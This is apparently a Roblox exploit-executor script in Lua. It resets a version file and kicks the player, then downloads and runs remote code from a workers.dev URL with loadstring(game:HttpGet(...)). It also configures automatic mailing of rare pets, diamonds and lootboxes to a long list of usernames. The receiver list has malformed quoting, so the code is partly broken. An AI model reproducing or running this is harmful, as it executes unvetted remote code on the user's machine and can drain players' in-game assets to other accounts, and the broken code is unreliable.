task.spawn(function()

_G.start_vvv_ = true
_G.delay_play_vvv3 = 1
_G.FPS_farm = 4


_G.FPS_event = 4


if _G.Super_S == true then
	
else			
	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" then
		--game.Players.LocalPlayer:Kick("kick fin")
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		--game.Players.LocalPlayer:Kick("kick pla")
	end
end

--task.wait(3600)


local _Config_Online = 17
local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		if EVENT_or_FARM == "E" then
			--game.Players.LocalPlayer:Kick("kick reset")		
		end
		game.Players.LocalPlayer:Kick("kick reset")		
		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end
loadstring(game:HttpGet("https://plain-cell-d3e8.kuvyndn.workers.dev/Check_USER.lua"))()

















getgenv().GMAX_MAIL_COST = "5m"
getgenv().GMAIL_ITEMS = {	

["Secret pet1"] = {Class = "Pet", Id = "Rainbow Swirl", MinAmount = 1, AllVariants = true},
["Secret pet2"] = {Class = "Pet", Id = "Banana", MinAmount = 1, AllVariants = true},
["Secret pet3"] = {Class = "Pet", Id = "Coin", MinAmount = 1, AllVariants = true},
["Secret pet4"] = {Class = "Pet", Id = "Yellow Lucky Block", MinAmount = 1, AllVariants = true},	
["Send Diamonds"] = {Class = "Currency", Id = "Diamonds", KeepAmount = "50m", MinAmount = "250m"},
["Deep Sea Treasure Chest"] = {Class = "Lootbox", Id= "Deep Sea Treasure Chest", MinAmount = 5},
["Hype Egg 2"] = {Class = "Lootbox", Id= "Hype Egg 2", MinAmount = 1},

--["LuckyPotion"] = {Class = "Potion", Tier = 9 ,Id = "Lucky", MinAmount = 1000, KeepAmount = 500},
--["Diamonds"] = {Class = "Potion", Tier = 9 ,Id = "Diamonds", MinAmount = 1000, KeepAmount = 500},


}
getgenv().GMAIL_RECEIVERS = {""Ash3rP0w3rPanda2018","GalaxyRider200343","soystaylan5","dreddyewele60","XxSaberFoxxX2024","Will0wC00kieSkater20","nalsur71230","XxRocketClawFlashxX","StormyAce15","Rock3tWolfKing2009","Magic_Legend200469","ChillMaster2011","Inferno_Eagle200889","Noah_SKATER35","XxOwenC0dexX2023","1953Crutchfield3117","Xx_VictoriaUltraCybe","FusionShadowCyber","AceInferno202467","sijmongirthss","Harp3rDuck23","RowlandCollinq943","MysticFireS0nic","Sky_Giga2017","TurboTig3rStr3am","R0ck3tClaw2021_YT","GlitchF0x34","WolfPix3lStr3am2017""}




end)


